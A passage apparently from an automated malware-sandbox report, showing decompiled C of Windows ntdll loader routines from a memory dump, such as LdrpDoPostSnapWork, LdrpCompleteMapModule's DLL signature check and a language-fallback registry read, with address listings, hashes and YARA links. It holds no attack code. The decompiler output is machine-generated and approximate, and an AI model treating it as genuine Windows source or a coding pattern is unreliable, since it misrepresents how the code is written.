						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00A18999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00A18999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xaf5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xaf5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00A22280(_t92, 0xaf86cc);
															_t94 = E00AD9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00A361A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xaf5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00A18A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xaf5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xaf5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00A4F380(_t136, 0x9e1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00A22280(_t108, 0xaf86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00A361A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00AD9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00A1FFB0(_t118, _t156, 0xaf86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00A49A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                                          0x00a18799
                                                                                                                          0x00a1879d
                                                                                                                          0x00a187a1
                                                                                                                          0x00a187a3
                                                                                                                          0x00a187a8
                                                                                                                          0x00a187c3
                                                                                                                          0x00a187c3
                                                                                                                          0x00a187c8
                                                                                                                          0x00a187d1
                                                                                                                          0x00a187d4
                                                                                                                          0x00a187d8
                                                                                                                          0x00a187e5
                                                                                                                          0x00a187ec
                                                                                                                          0x00a69bfe
                                                                                                                          0x00a69c00
                                                                                                                          0x00a69c02
                                                                                                                          0x00a69c08
                                                                                                                          0x00a69c0d
                                                                                                                          0x00a69c0f
                                                                                                                          0x00a69c14
                                                                                                                          0x00a69c2d
                                                                                                                          0x00a69c32
                                                                                                                          0x00a69c37
                                                                                                                          0x00a69c3a
                                                                                                                          0x00a69c3c
                                                                                                                          0x00a69c42
                                                                                                                          0x00a69c42
                                                                                                                          0x00a69c3c
                                                                                                                          0x00a69c02
                                                                                                                          0x00a187da
                                                                                                                          0x00a187df
                                                                                                                          0x00a187e3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a187e3
                                                                                                                          0x00a187f2
                                                                                                                          0x00000000
                                                                                                                          0x00a187fb
                                                                                                                          0x00a187fd
                                                                                                                          0x00a187fe
                                                                                                                          0x00a1880e
                                                                                                                          0x00a1880f
                                                                                                                          0x00a18810
                                                                                                                          0x00a18814
                                                                                                                          0x00a1881a
                                                                                                                          0x00a1881c
                                                                                                                          0x00a1881f
                                                                                                                          0x00a18821
                                                                                                                          0x00a18822
                                                                                                                          0x00a18824
                                                                                                                          0x00a18826
                                                                                                                          0x00a1882c
                                                                                                                          0x00a1882e
                                                                                                                          0x00a69c48
                                                                                                                          0x00a69c48
                                                                                                                          0x00a18834
                                                                                                                          0x00a18834
                                                                                                                          0x00a18837
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a18837
                                                                                                                          0x00a1882e
                                                                                                                          0x00a1883d
                                                                                                                          0x00a18840
                                                                                                                          0x00a18843
                                                                                                                          0x00a18846
                                                                                                                          0x00a18849
                                                                                                                          0x00a1884c
                                                                                                                          0x00a1884e
                                                                                                                          0x00a18850
                                                                                                                          0x00a18852
                                                                                                                          0x00a18854
                                                                                                                          0x00a18857
                                                                                                                          0x00a188b4
                                                                                                                          0x00a188b6
                                                                                                                          0x00a188b6
                                                                                                                          0x00a18859
                                                                                                                          0x00a18859
                                                                                                                          0x00a18859
                                                                                                                          0x00a18861
                                                                                                                          0x00a18866
                                                                                                                          0x00a1886a
                                                                                                                          0x00a1893d
                                                                                                                          0x00a18941
                                                                                                                          0x00000000
                                                                                                                          0x00a18947
                                                                                                                          0x00a18947
                                                                                                                          0x00a1894a
                                                                                                                          0x00a1894c
                                                                                                                          0x00000000
                                                                                                                          0x00a18952
                                                                                                                          0x00a18955
                                                                                                                          0x00a1895a
                                                                                                                          0x00a1895d
                                                                                                                          0x00a1895d
                                                                                                                          0x00a1895f
                                                                                                                          0x00a18961
                                                                                                                          0x00a18961
                                                                                                                          0x00a18968
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a1896a
                                                                                                                          0x00a1896b
                                                                                                                          0x00a1896e
                                                                                                                          0x00000000
                                                                                                                          0x00a18970
                                                                                                                          0x00a18970
                                                                                                                          0x00a18970
                                                                                                                          0x00a18970
                                                                                                                          0x00a18972
                                                                                                                          0x00a18972
                                                                                                                          0x00a18974
                                                                                                                          0x00000000
                                                                                                                          0x00a1897a
                                                                                                                          0x00a1897a
                                                                                                                          0x00a1897d
                                                                                                                          0x00000000
                                                                                                                          0x00a18983
                                                                                                                          0x00a69c65
                                                                                                                          0x00a69c6d
                                                                                                                          0x00a69c72
                                                                                                                          0x00a69c75
                                                                                                                          0x00a69c75
                                                                                                                          0x00a69c82
                                                                                                                          0x00a69c86
                                                                                                                          0x00a69c87
                                                                                                                          0x00a69c88
                                                                                                                          0x00a69c89
                                                                                                                          0x00a69c8c
                                                                                                                          0x00a69c90
                                                                                                                          0x00a69c95
                                                                                                                          0x00a69c97
                                                                                                                          0x00a69ca0
                                                                                                                          0x00a69ca3
                                                                                                                          0x00a69ca9
                                                                                                                          0x00a69ca9
                                                                                                                          0x00000000
                                                                                                                          0x00a69ca9
                                                                                                                          0x00a69ca3
                                                                                                                          0x00000000
                                                                                                                          0x00a69c97
                                                                                                                          0x00a1897d
                                                                                                                          0x00000000
                                                                                                                          0x00a18974
                                                                                                                          0x00a18988
                                                                                                                          0x00a18992
                                                                                                                          0x00a18996
                                                                                                                          0x00000000
                                                                                                                          0x00a18996
                                                                                                                          0x00a1894c
                                                                                                                          0x00000000
                                                                                                                          0x00a18870
                                                                                                                          0x00a1887b
                                                                                                                          0x00a1887d
                                                                                                                          0x00a1887f
                                                                                                                          0x00a18881
                                                                                                                          0x00a18884
                                                                                                                          0x00a18884
                                                                                                                          0x00a18886
                                                                                                                          0x00a18889
                                                                                                                          0x00a1888c
                                                                                                                          0x00a1888e
                                                                                                                          0x00a18891
                                                                                                                          0x00a18891
                                                                                                                          0x00a18898
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a1889a
                                                                                                                          0x00a1889b
                                                                                                                          0x00a1889e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a188a0
                                                                                                                          0x00a188a8
                                                                                                                          0x00a188b0
                                                                                                                          0x00a188b2
                                                                                                                          0x00a188d3
                                                                                                                          0x00a188d5
                                                                                                                          0x00000000
                                                                                                                          0x00a188d7
                                                                                                                          0x00a188db
                                                                                                                          0x00a188dc
                                                                                                                          0x00a188e0
                                                                                                                          0x00a188e8
                                                                                                                          0x00a188ee
                                                                                                                          0x00a188f0
                                                                                                                          0x00a188f3
                                                                                                                          0x00a188fc
                                                                                                                          0x00a18901
                                                                                                                          0x00a18906
                                                                                                                          0x00a1890c
                                                                                                                          0x00a1890c
                                                                                                                          0x00a1890f
                                                                                                                          0x00a18916
                                                                                                                          0x00a18917
                                                                                                                          0x00a18918
                                                                                                                          0x00a18919
                                                                                                                          0x00a1891a
                                                                                                                          0x00a1891f
                                                                                                                          0x00a18921
                                                                                                                          0x00a69c52
                                                                                                                          0x00a69c55
                                                                                                                          0x00a69c5b
                                                                                                                          0x00a69cac
                                                                                                                          0x00a69cc0
                                                                                                                          0x00a69cc0
                                                                                                                          0x00a69c55
                                                                                                                          0x00a18927
                                                                                                                          0x00a18927
                                                                                                                          0x00a1892f
                                                                                                                          0x00a18933
                                                                                                                          0x00000000
                                                                                                                          0x00a188f5
                                                                                                                          0x00a188f5
                                                                                                                          0x00000000
                                                                                                                          0x00a188f7
                                                                                                                          0x00a188f7
                                                                                                                          0x00a188fa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a188fa
                                                                                                                          0x00a188f5
                                                                                                                          0x00a188f3
                                                                                                                          0x00000000
                                                                                                                          0x00a188d5
                                                                                                                          0x00000000
                                                                                                                          0x00a188b2
                                                                                                                          0x00a188c9
                                                                                                                          0x00000000
                                                                                                                          0x00a188c9
                                                                                                                          0x00a1887f
                                                                                                                          0x00a1886a
                                                                                                                          0x00a18857
                                                                                                                          0x00a18852
                                                                                                                          0x00a188bf
                                                                                                                          0x00a188bf
                                                                                                                          0x00a187aa
                                                                                                                          0x00a187ad
                                                                                                                          0x00a187ae
                                                                                                                          0x00a187b4
                                                                                                                          0x00a187b5
                                                                                                                          0x00a187b6
                                                                                                                          0x00a187b8
                                                                                                                          0x00a187bd
                                                                                                                          0x00a187c1
                                                                                                                          0x00a187f4
                                                                                                                          0x00a187fa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a187c1
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          • LdrpDoPostSnapWork, xrefs: 00A69C1E
                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 00A69C28
                                                                                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00A69C18
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                          • API String ID: 2994545307-1948996284
                                                                                                                          • Opcode ID: 1cea9fdd8b2e42f7bfe7f0d5f7fc40de7130ea6c215727b6c22d99f9c41570fe
                                                                                                                          • Instruction ID: 419eb309aab6db3a6af386df6ae2e175dbee96cf42d49b4b366d212733bcf5aa
                                                                                                                          • Opcode Fuzzy Hash: 1cea9fdd8b2e42f7bfe7f0d5f7fc40de7130ea6c215727b6c22d99f9c41570fe
                                                                                                                          • Instruction Fuzzy Hash: 59910231A00216EFDF18DF99C981AFA77B5FF44340B544169E905AB291EF34ED81CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A17E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00A17E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00A1CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00A0C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xaf5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00A85510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xaf5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00A27D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00A27D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00A87016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00A27D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00A27D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00A87016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00A3A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00A0B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                                          0x00a17e4c
                                                                                                                          0x00a17e50
                                                                                                                          0x00a17e55
                                                                                                                          0x00a17e58
                                                                                                                          0x00a17e5d
                                                                                                                          0x00a17e71
                                                                                                                          0x00a17f33
                                                                                                                          0x00a17e77
                                                                                                                          0x00a17e77
                                                                                                                          0x00a17e79
                                                                                                                          0x00a17e79
                                                                                                                          0x00a17e7e
                                                                                                                          0x00a17f45
                                                                                                                          0x00a69848
                                                                                                                          0x00000000
                                                                                                                          0x00a69848
                                                                                                                          0x00a17f4e
                                                                                                                          0x00a17f53
                                                                                                                          0x00a17f5a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a6985a
                                                                                                                          0x00a69862
                                                                                                                          0x00a69866
                                                                                                                          0x00000000
                                                                                                                          0x00a6986c
                                                                                                                          0x00000000
                                                                                                                          0x00a6986c
                                                                                                                          0x00a17e84
                                                                                                                          0x00a17e84
                                                                                                                          0x00a17e8d
                                                                                                                          0x00a69871
                                                                                                                          0x00a17eb8
                                                                                                                          0x00a17ec0
                                                                                                                          0x00a17ec0
                                                                                                                          0x00a17e9a
                                                                                                                          0x00a6987e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a69884
                                                                                                                          0x00a6988b
                                                                                                                          0x00a698a7
                                                                                                                          0x00a698ac
                                                                                                                          0x00a698b1
                                                                                                                          0x00a698b6
                                                                                                                          0x00a698b8
                                                                                                                          0x00a698b8
                                                                                                                          0x00a698b9
                                                                                                                          0x00000000
                                                                                                                          0x00a698b9
                                                                                                                          0x00a17ea0
                                                                                                                          0x00a17ea7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a17eac
                                                                                                                          0x00a17eb1
                                                                                                                          0x00a17ec6
                                                                                                                          0x00a17ed0
                                                                                                                          0x00a698cc
                                                                                                                          0x00a17ed6
                                                                                                                          0x00a17ed6
                                                                                                                          0x00a17ed6
                                                                                                                          0x00a17ede
                                                                                                                          0x00a17ee3
                                                                                                                          0x00a698e3
                                                                                                                          0x00a698f0
                                                                                                                          0x00a69902
                                                                                                                          0x00a698f2
                                                                                                                          0x00a698fb
                                                                                                                          0x00a698fb
                                                                                                                          0x00a69907
                                                                                                                          0x00a6991d
                                                                                                                          0x00a6991d
                                                                                                                          0x00a69907
                                                                                                                          0x00a698e3
                                                                                                                          0x00a17ef0
                                                                                                                          0x00a17f14
                                                                                                                          0x00a17f14
                                                                                                                          0x00a17f1e
                                                                                                                          0x00a69946
                                                                                                                          0x00a17f24
                                                                                                                          0x00a17f24
                                                                                                                          0x00a17f24
                                                                                                                          0x00a17f2c
                                                                                                                          0x00a6996a
                                                                                                                          0x00a69975
                                                                                                                          0x00a69975
                                                                                                                          0x00a6997e
                                                                                                                          0x00a69993
                                                                                                                          0x00a69993
                                                                                                                          0x00a6997e
                                                                                                                          0x00000000
                                                                                                                          0x00a17ef2
                                                                                                                          0x00a17efc
                                                                                                                          0x00a17f0a
                                                                                                                          0x00a17f0e
                                                                                                                          0x00a69933
                                                                                                                          0x00000000
                                                                                                                          0x00a69933
                                                                                                                          0x00000000
                                                                                                                          0x00a17f0e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a17eb1

                                                                                                                          Strings
                                                                                                                          • LdrpCompleteMapModule, xrefs: 00A69898
                                                                                                                          • minkernel\ntdll\ldrmap.c, xrefs: 00A698A2
                                                                                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 00A69891
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                          • API String ID: 0-1676968949
                                                                                                                          • Opcode ID: f2ee1fd5fdb494744378cfd85419bc0ca2d5eebfa6b7e7277ef735ab004981c9
                                                                                                                          • Instruction ID: 7001ea28f12c731c5ba2e1b788c8c6c4119787c6c30b390cdce4823c3922c6c6
                                                                                                                          • Opcode Fuzzy Hash: f2ee1fd5fdb494744378cfd85419bc0ca2d5eebfa6b7e7277ef735ab004981c9
                                                                                                                          • Instruction Fuzzy Hash: F3511331A087449FDB22CB68CA44BAE7BF8EF01714F1416A9E9519B7E1D730ED80CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A0E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 93%
                                                                                                                          			E00A0E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00A0F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00A495D0();
						}
						if(_t78 != 0) {
							L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00A4FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00A4BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00A49600();
					if(_t97 < 0) {
						goto L6;
					}
					E00A4BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00A0F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00A4BB40(_t83, _t102 + 0x24, _t78);
								if(L00A143C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00A4BB40(_t84, _t102 + 0x24, _t94);
									if(L00A143C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                                          0x00a0e620
                                                                                                                          0x00a0e628
                                                                                                                          0x00a0e62f
                                                                                                                          0x00a0e631
                                                                                                                          0x00a0e635
                                                                                                                          0x00a0e637
                                                                                                                          0x00a0e63e
                                                                                                                          0x00a65503
                                                                                                                          0x00a65503
                                                                                                                          0x00a0e64c
                                                                                                                          0x00a0e64c
                                                                                                                          0x00a0e651
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a0e661
                                                                                                                          0x00a0e665
                                                                                                                          0x00a6542a
                                                                                                                          0x00a0e715
                                                                                                                          0x00a0e71a
                                                                                                                          0x00a0e71c
                                                                                                                          0x00a0e720
                                                                                                                          0x00a0e720
                                                                                                                          0x00a0e727
                                                                                                                          0x00a0e736
                                                                                                                          0x00a0e736
                                                                                                                          0x00a0e743
                                                                                                                          0x00a0e743
                                                                                                                          0x00a0e673
                                                                                                                          0x00a0e678
                                                                                                                          0x00a0e67d
                                                                                                                          0x00a0e682
                                                                                                                          0x00a0e685
                                                                                                                          0x00a0e692
                                                                                                                          0x00a0e69b
                                                                                                                          0x00a0e6a3
                                                                                                                          0x00a0e6ad
                                                                                                                          0x00a0e6b1
                                                                                                                          0x00a0e6b2
                                                                                                                          0x00a0e6bb
                                                                                                                          0x00a0e6bf
                                                                                                                          0x00a0e6c0
                                                                                                                          0x00a0e6c8
                                                                                                                          0x00a0e6cc
                                                                                                                          0x00a0e6d5
                                                                                                                          0x00a0e6d9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a0e6e5
                                                                                                                          0x00a0e6ea
                                                                                                                          0x00a0e6f9
                                                                                                                          0x00a0e70b
                                                                                                                          0x00a0e70f
                                                                                                                          0x00a65439
                                                                                                                          0x00a6545e
                                                                                                                          0x00a6545e
                                                                                                                          0x00000000
                                                                                                                          0x00a6545e
                                                                                                                          0x00a6543b
                                                                                                                          0x00a6543e
                                                                                                                          0x00a65440
                                                                                                                          0x00a65445
                                                                                                                          0x00a65472
                                                                                                                          0x00a65475
                                                                                                                          0x00a6548d
                                                                                                                          0x00a65493
                                                                                                                          0x00a654a9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a654ab
                                                                                                                          0x00a654b4
                                                                                                                          0x00a654bc
                                                                                                                          0x00a654c8
                                                                                                                          0x00a654de
                                                                                                                          0x00a654fb
                                                                                                                          0x00a654e0
                                                                                                                          0x00a654e6
                                                                                                                          0x00a654eb
                                                                                                                          0x00a654eb
                                                                                                                          0x00a654de
                                                                                                                          0x00000000
                                                                                                                          0x00a654bc
                                                                                                                          0x00a65477
                                                                                                                          0x00a6547a
                                                                                                                          0x00a65480
                                                                                                                          0x00a65483
                                                                                                                          0x00a65486
                                                                                                                          0x00a6548b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a6548b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a65447
                                                                                                                          0x00a65447
                                                                                                                          0x00a65447
                                                                                                                          0x00a65447
                                                                                                                          0x00a6544e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a65450
                                                                                                                          0x00a65452
                                                                                                                          0x00a65455
                                                                                                                          0x00a6545a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a6545c
                                                                                                                          0x00a6546a
                                                                                                                          0x00a6546d
                                                                                                                          0x00a6546f
                                                                                                                          0x00000000
                                                                                                                          0x00a6546f
                                                                                                                          0x00a0e70f

                                                                                                                          Strings
